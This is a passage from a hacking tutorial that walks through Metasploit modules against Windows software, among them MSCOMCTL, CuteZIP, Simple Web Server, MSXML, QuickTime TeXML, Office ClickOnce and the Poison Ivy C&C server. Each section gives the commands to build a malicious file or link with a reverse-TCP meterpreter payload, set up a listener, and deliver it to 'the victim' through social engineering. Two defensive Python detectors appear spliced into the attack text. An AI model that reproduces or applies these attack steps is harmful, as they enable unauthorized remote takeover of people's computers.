
msf exploit (ms12_027_mscomctl_bof)>set payload windows/meterpreter/reverse_tcp
msf exploit (ms12_027_mscomctl_bof)>set lhost 192.168.42.131 (IP of Local Host)
msf exploit (ms12_027_mscomctl_bof)>exploit

After we successfully generate the malicious DOC file, it will be stored on your local computer at /root/.msf4/local/msf.doc. Now we need to set up a listener to handle the reverse connection sent by the victim when the exploit is successfully executed.

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.42.131
exploit


Now send your msf.doc file to the victim; as soon as they download and open it, you can access a meterpreter shell on the victim's computer.

Attacking On Remote Windows PC Using GlobalSCAPE CuteZIP Stack Buffer Overflow :
This module exploits a stack-based buffer overflow vulnerability in version 2.1 of CuteZIP. In order for the command to be executed, an attacker must convince the target user to open a specially crafted zip file with CuteZIP. By doing so, an attacker can execute arbitrary code as the target user.
Open backtrack terminal, type msfconsole, then type the command below: use exploit/windows/fileformat/cutezip_bof

msf exploit (cutezip_bof)>set payload windows/meterpreter/reverse_tcp
msf exploit (cutezip_bof)>set lhost 192.168.42.131 (IP of Local Host)
msf exploit (cutezip_bof)>exploit

After we successfully generate the malicious ZIP file, it will be stored on your local computer at /root/.msf4/local/msf.zip. Now we need to set up a listener to handle the reverse connection sent by the victim when the exploit is successfully executed.

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.42.131
exploit


Now send your msf.zip file to the victim; as soon as they download and open it, you can access a meterpreter shell on the victim's computer.

Attacking On Remote Windows PC Using Simple Web Server Connection Header Buffer Overflow :
This module exploits a vulnerability in Simple Web Server 2.2 rc2. A remote user can send a long string in the Connection header to cause an overflow on the stack when the function vsprintf() is used, and gain arbitrary code execution. The module has been tested successfully on Windows 7 SP1 and Windows XP SP3.
Open backtrack terminal, type msfconsole, then type the command below: use exploit/windows/http/sws_connection_bof

msf exploit(sws_connection_bof) > set payload windows/meterpreter/reverse_tcp
msf exploit(sws_connection_bof) > set lhost 192.168.42.131 [IP of Local Host]
msf exploit(sws_connection_bof) > set rhost 192.168.1.7 [IP of Victim PC]
msf exploit(sws_connection_bof) > exploit

Now the URL you should give to your victim is http://192.168.42.131. Send the link of the server to the victim via any social engineering technique. When the victim opens that link in their browser, you get access to the victim's PC. Use sessions -l and the session number to connect to the session.
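From the defender's side, the weak point described above is simple to spot: the Connection header legitimately carries only short tokens such as keep-alive or close, so a length check on incoming requests is a cheap detection for the oversized value the module sends. The following Python check is an added example, not part of the original tutorial and not Metasploit code; the two sample requests and the 64-byte threshold are constructed assumptions, not values taken from the module.

```python
"""Flag HTTP requests carrying an abnormally long Connection header.

Added defensive example (not part of the original tutorial).  Simple Web
Server 2.2 rc2 overflows the stack when the Connection header is too long,
so a front-end proxy, IDS or log parser can alert on the header length
alone.  The sample requests below are constructed; the threshold is an
assumed tuning value (legitimate values are a handful of bytes).
"""
from typing import Dict, List, Optional

MAX_CONNECTION_LEN = 64  # assumed threshold; "keep-alive" is 10 bytes


def parse_headers(raw: bytes) -> Dict[str, str]:
    """Parse the header block of a raw HTTP request into a lowercase-keyed dict."""
    head, _, _ = raw.partition(b"\r\n\r\n")
    lines = head.split(b"\r\n")
    headers: Dict[str, str] = {}
    for line in lines[1:]:  # lines[0] is the request line
        name, sep, value = line.partition(b":")
        if not sep:
            continue  # malformed header line, ignore it
        headers[name.strip().lower().decode("latin-1")] = value.strip().decode("latin-1")
    return headers


def check_request(raw: bytes) -> Optional[str]:
    """Return an alert message if the Connection header is suspicious, else None."""
    value = parse_headers(raw).get("connection")
    if value is None:
        return None
    if len(value) > MAX_CONNECTION_LEN:
        return f"Connection header of {len(value)} bytes exceeds {MAX_CONNECTION_LEN}"
    return None


# Constructed sample traffic: a normal request and one with an oversized header.
SAMPLE_REQUESTS: List[bytes] = [
    b"GET / HTTP/1.1\r\nHost: 192.168.1.7\r\nConnection: keep-alive\r\n\r\n",
    b"GET / HTTP/1.1\r\nHost: 192.168.1.7\r\nConnection: " + b"A" * 2000 + b"\r\n\r\n",
]


def scan(requests: List[bytes]) -> List[int]:
    """Return the indexes of the requests that raise an alert."""
    return [i for i, req in enumerate(requests) if check_request(req) is not None]


if __name__ == "__main__":
    for i, req in enumerate(SAMPLE_REQUESTS):
        print(i, check_request(req) or "ok")
```

The same check can be expressed as a web-proxy rule or IDS signature; the point is that the vulnerable field is one whose legitimate values are tiny, so a plain length limit catches the malformed request before it reaches the server.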


Attacking On Remote Windows 7 PC Using Microsoft XML Core Services MSXML Uninitialized Memory Corruption : This module exploits a memory corruption flaw in Microsoft XML Core Services when trying to access an uninitialized Node with the getDefinition API, which may corrupt memory, allowing remote code execution.
Open backtrack terminal, type msfconsole, then type the command below: use exploit/windows/browser/msxml_get_definition_code_exec

Msf exploit (msxml_get_definition_code_exec)>set payload windows/meterpreter/reverse_tcp
Msf exploit (msxml_get_definition_code_exec)>set lhost 192.168.42.131 (IP of Local Host)
Msf exploit (msxml_get_definition_code_exec)>set srvhost 192.168.42.131 (This must be an address on the local machine)
Msf exploit (msxml_get_definition_code_exec)>set uripath / (The URL to use for this exploit)
Msf exploit (msxml_get_definition_code_exec)>exploit

Now the URL you should give to your victim is http://192.168.42.131:8080/. Send the link of the server to the victim via any social engineering technique. When the victim opens that link in their browser, you get access to the victim's PC. Use sessions -l and the session number to connect to the session.


Attacking On Remote Windows 7 PC Using Poison Ivy 2.3.2 C&C Server Buffer Overflow : This module exploits a stack buffer overflow in the Poison Ivy 2.3.2 C&C server. The exploit does not need to know the password chosen for the bot/server communication. If the C&C is configured with the default admin password, the exploit should work fine. If the C&C is configured with another password, the exploit can fail. The check command can be used to determine if the C&C target is using the default admin password. Hopefully an exploit try won't crash the Poison Ivy C&C process, just the thread responsible for handling the connection. Because of this the module provides the RANDHEADER option and a bruteforce target. If RANDHEADER is used, a random header will be used. If the bruteforce target is selected, a random header will be sent in case the default for the password admin doesn't work. Bruteforce will stop after 5 tries or when a session is obtained.
Open backtrack terminal, type msfconsole, then type the command below: use exploit/windows/misc/poisonivy_bof

Msf exploit (poisonivy_bof)>set payload windows/meterpreter/reverse_tcp
Msf exploit (poisonivy_bof)>set lhost 192.168.42.131 (IP of Local Host)
Msf exploit (poisonivy_bof)>set rhost 192.168.12.119 (IP of Victim PC)
Msf exploit (poisonivy_bof)>exploit

Now the URL you should give to your victim is http://192.168.42.131. Send the link of the server to the victim via any social engineering technique. When the victim opens that link in their browser, you get access to the victim's PC. Use sessions -l and the session number to connect to the session.

Attacking On Remote Windows PC Using Apple QuickTime TeXML Stack Buffer Overflow : This module exploits a vulnerability found in Apple QuickTime. When handling a TeXML file, it is possible to trigger a stack-based buffer overflow and then gain arbitrary code execution under the context of the user. The flaw is generally known as a bug while processing the transform attribute; however, that attack vector seems to only cause a TerminateProcess call due to a corrupt stack cookie, and more data will only trigger a warning about the malformed XML file. This module exploits the color value instead, which accomplishes the same thing.
Open backtrack terminal, type msfconsole, then type the command below: use exploit/windows/fileformat/apple_quicktime_texml

Msf exploit (apple_quicktime_texml)>set payload windows/meterpreter/reverse_tcp
Msf exploit (apple_quicktime_texml)>set lhost 192.168.42.131 (IP of Local Host)
Msf exploit (apple_quicktime_texml)>set srvhost 192.168.1.3 (Victim IP)
Msf exploit (apple_quicktime_texml)>show targets
Msf exploit (apple_quicktime_texml)>set target 0
Msf exploit (apple_quicktime_texml)>exploit

After we successfully generate the malicious file, it will be stored on your local computer at /root/.msf4/local/msf.xml. Now we need to set up a listener to handle the reverse connection sent by the victim when the exploit executes successfully.
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.42.131
exploit
Now send your msf.xml file to the victim. As soon as they download and open it, you get a meterpreter shell on the victim's computer.

Attacking On Remote Windows PC Using Microsoft Office ClickOnce Unsafe Object Package Handling Vulnerability :
This module exploits a vulnerability found in Microsoft Office's ClickOnce feature. When handling a macro document, the application fails to recognize certain file extensions as dangerous executables, which can be used to bypass the warning message. This allows you to trick your victim into opening the malicious document, which will load up either a Python or Ruby payload of your choosing, and then finally download and execute our executable.
Open backtrack terminal, type msfconsole, then type the command below: use exploit/windows/fileformat/ms12_005

Msf exploit (ms12_005)>set payload windows/meterpreter/reverse_tcp
Msf exploit (ms12_005)>set lhost 192.168.42.131 (IP of Local Host)
Msf exploit (ms12_005)>exploit


After we successfully generate the malicious document file, it will be stored on your local computer at /root/.msf4/local/msf.docm. Now send your msf.docm file to the victim. As soon as they download and open it, you get a meterpreter shell on the victim's computer.
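The document-based attacks above (msf.doc, msf.docm and the embedded-object trick of ms12_005) all depend on a user opening a file that carries something beyond text. A mail gateway or incident responder can triage a macro-enabled document before anyone opens it, because a .docm is an OOXML zip container whose macro project sits at word/vbaProject.bin and whose embedded objects sit under word/embeddings/. The following Python triage script is an added defensive example, not part of the original tutorial and not Metasploit code; the two minimal sample documents it builds are constructed stand-ins, not real Office output, and the "hold for review" policy is an assumption.

```python
"""Triage a macro-enabled Word document (.docm) for embedded objects.

Added defensive example; not part of the original tutorial and not
Metasploit code.  The ms12_005 module relies on Office launching a file
packaged inside a document, so listing what a .docm carries is a useful
gateway check.  word/vbaProject.bin and word/embeddings/ are standard
OOXML paths; the sample containers built here are constructed, minimal
stand-ins rather than genuine Office output.
"""
import io
import zipfile
from typing import Dict, List


def build_sample_docm(with_embedding: bool) -> bytes:
    """Build a constructed, minimal .docm-like zip, optionally with one embedded object."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("[Content_Types].xml", "<Types/>")
        zf.writestr("word/document.xml", "<w:document/>")
        zf.writestr("word/vbaProject.bin", b"\x00" * 16)  # stand-in macro project
        if with_embedding:
            # Embedded OLE objects (Packager objects included) are stored here.
            zf.writestr("word/embeddings/oleObject1.bin", b"\x00" * 16)
    return buf.getvalue()


def inspect_docm(data: bytes) -> Dict[str, object]:
    """Report macro presence and every embedded-object path inside the container."""
    has_macros = False
    embeddings: List[str] = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for name in zf.namelist():
            if name == "word/vbaProject.bin":
                has_macros = True
            elif name.startswith("word/embeddings/") and not name.endswith("/"):
                embeddings.append(name)
    return {"has_macros": has_macros, "embeddings": embeddings}


def needs_review(report: Dict[str, object]) -> bool:
    """Assumed policy: any embedded object in a macro-enabled document is held for review."""
    return bool(report["embeddings"])


if __name__ == "__main__":
    samples = (("clean", build_sample_docm(False)), ("embedded", build_sample_docm(True)))
    for label, doc in samples:
        rep = inspect_docm(doc)
        print(label, rep, "REVIEW" if needs_review(rep) else "pass")
```

Real-world use would point inspect_docm at attachments pulled from a mail queue; the value of the check is that it looks at the container structure rather than trusting the extension or the warning dialog the vulnerability bypasses.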


Tnx All Dears For Reading This Article By Red H4t V!per
